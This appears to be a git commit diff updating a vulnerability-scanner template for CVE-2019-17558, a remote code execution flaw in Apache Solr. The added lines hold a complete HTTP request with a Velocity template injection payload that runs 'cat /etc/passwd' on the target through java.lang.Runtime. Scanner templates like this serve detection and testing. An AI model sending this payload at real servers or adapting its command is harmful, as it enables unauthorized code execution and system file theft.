Update CVE-2019-17558.yaml

patch-1
bauthard 2020-09-03 22:44:42 +05:30
parent 6d1789ff76
commit 39cfec87ae
1 changed files with 34 additions and 33 deletions

View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: critical
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133 <--good reference and it works
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
# https://nvd.nist.gov/vuln/detail/CVE-2019-17558
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
@ -36,6 +36,7 @@ requests:
# RCE via velocity template:
# Get /etc/passwd
- |
GET /solr/atom/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: {{Hostname}}